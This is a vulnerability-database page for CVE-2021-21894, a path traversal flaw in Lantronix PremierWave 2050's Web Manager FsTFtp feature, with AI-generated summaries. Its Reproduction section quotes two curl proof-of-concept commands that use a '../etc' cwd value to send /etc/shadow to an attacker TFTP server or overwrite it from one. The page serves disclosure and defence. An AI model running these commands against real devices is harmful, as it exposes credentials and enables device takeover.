CVE-2021-21894
Description
A directory traversal vulnerability exists in the Web Manager FsTFtp functionality of Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU). A specially crafted HTTP request can lead to arbitrary file overwrite FsTFtp file disclosure. An attacker can make an authenticated HTTP request to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A directory traversal vulnerability in Lantronix PremierWave 2050 Web Manager FsTFtp allows authenticated attackers to overwrite or disclose arbitrary files.
Vulnerability
The FsTFtp functionality in the Web Manager of Lantronix PremierWave 2050 firmware version 8.9.0.0R4 (tested in QEMU) allows authenticated users with the filesystem privilege to direct a TFTP client to GET or PUT files. The cwd parameter in the HTTP POST request is not properly sanitized, enabling path traversal sequences (e.g., ../) to escape the intended /ltrx_user/ directory. This leads to arbitrary file overwrite and arbitrary file disclosure [1].
Exploitation
An attacker must have authenticated access to the Web Manager with the filesystem privilege. By sending a crafted HTTP POST request (e.g., ajax=FsTFtp&cmd=put&local=shadow&remote=shadow&host=...) and manipulating the cwd parameter with path traversal primitives, the attacker can direct the device's TFTP client to read or write files outside the restricted directory. No additional user interaction is required beyond the initial authentication [1].
Impact
Successful exploitation allows the attacker to read sensitive files (e.g., /etc/shadow) or overwrite arbitrary files on the device's filesystem. This can lead to disclosure of credentials, modification of system configuration, or complete compromise of the device. The CVSSv3 score is 9.1 (Critical) with a scope change, indicating high impact on confidentiality, integrity, and availability [1].
Mitigation
As of the publication date (2021-12-22), no official patch has been released by Lantronix. The product may be end-of-life; users should verify support status. Workarounds include restricting access to the Web Manager to trusted users only, disabling the FsTFtp feature if not required, and monitoring for anomalous TFTP traffic. This vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: = 8.9.0.0R4
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient sanitization of the `cwd` HTTP POST parameter allows path traversal sequences to escape the restricted `/ltrx_user/` directory."
Attack vector
An authenticated attacker with filesystem privilege sends a crafted HTTP POST request to the Web Manager's FsTFtp feature. By setting the `cwd` parameter to a path traversal sequence such as `../etc`, the attacker can direct the device's TFTP client to read or write files outside the restricted `/ltrx_user/` directory [ref_id=1]. For file disclosure (CVE-2021-21894), the attacker uses `cmd=put` to upload a sensitive file like `/etc/shadow` to an attacker-controlled TFTP server. For arbitrary file overwrite (CVE-2021-21895), the attacker uses `cmd=get` to download a malicious file from a TFTP server into an arbitrary location on the device, overwriting files such as `/etc/shadow` or SSH authorized_keys while preserving original permissions [ref_id=1].
Affected code
The vulnerability exists in the Web Manager FsTFtp functionality of the Lantronix PremierWave 2050. The attacker-controlled HTTP POST parameter `cwd` is not fully sanitized before being composed into the final file path, allowing path traversal sequences like `../etc` to escape the intended `/ltrx_user/` directory [ref_id=1].
What the fix does
The advisory does not include a patch or specific remediation from the vendor. The root cause is insufficient sanitization of the `cwd` HTTP POST parameter, which allows path traversal sequences like `../` to bypass the intended restriction to the `/ltrx_user/` directory [ref_id=1]. A proper fix would require validating that the resolved file path remains within the allowed directory, rejecting any path traversal sequences that escape the `/ltrx_user/` prefix.
Preconditions
- authAttacker must have valid credentials with filesystem privilege on the device
- networkAttacker must have network access to the Web Manager interface
- networkFor file disclosure (PUT), attacker must control a TFTP server reachable from the device
- networkFor file overwrite (GET), attacker must control a TFTP server to serve the malicious file
Reproduction
The advisory provides the following curl command for file disclosure (CVE-2021-21894): `curl --user admin:PASS -d "ajax=FsTFtp&cmd=put&local=shadow&remote=shadow&host=192.168.0.254&port=69&submit=Transfer&cwd=../etc" http://192.168.0.1/` [ref_id=1]. For arbitrary file overwrite (CVE-2021-21895): `curl --user admin:PASS -d "ajax=FsTFtp&cmd=get&local=shadow&remote=shadow&host=192.168.0.254&port=69&submit=Transfer&cwd=../etc" http://192.168.0.1/` [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- talosintelligence.com/vulnerability_reports/TALOS-2021-1337mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.